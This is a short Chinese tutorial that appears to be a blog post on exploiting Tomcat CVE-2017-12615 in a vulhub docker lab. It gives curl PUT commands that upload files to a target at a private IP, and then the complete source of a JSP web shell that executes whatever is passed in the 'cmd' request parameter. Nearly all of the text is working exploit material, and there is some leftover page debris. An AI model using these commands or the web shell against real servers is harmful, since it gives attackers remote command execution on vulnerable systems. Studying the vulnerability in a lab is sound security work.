CVE-2017-12615 tomcat漏洞利用

1.搭建漏洞环境 参考github https://github.com/vulhub/vulhub.git  本文使用文件 vulhub/tomcat/CVE-2017-12615 

使用docker-compose 运行靶机

2.执行PUT方法上传木马

#-d 指定内容
curl -v -X PUT -d "younglinuxer" 192.168.123.38:8080/1.jsp/


# -F "file=@{FILE_NAME}" 指定上传文件 
curl -v -X PUT -F "[email protected]" 192.168.123.38:8080/1.jsp/

3.上传木马文件yuan.jsp  此段代码为网上截取一段jsp代码   删除原来使用的cmd.exe 解析器(靶机为Linux)

<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
%>

<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "\n
"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null ) { out.println(disr); disr = dis.readLine(); } } %>

 

5.访问http://192.168.123.38:8080/1.jsp  执行命令

CVE-2017-12615 tomcat漏洞利用_第1张图片

你可能感兴趣的:(test)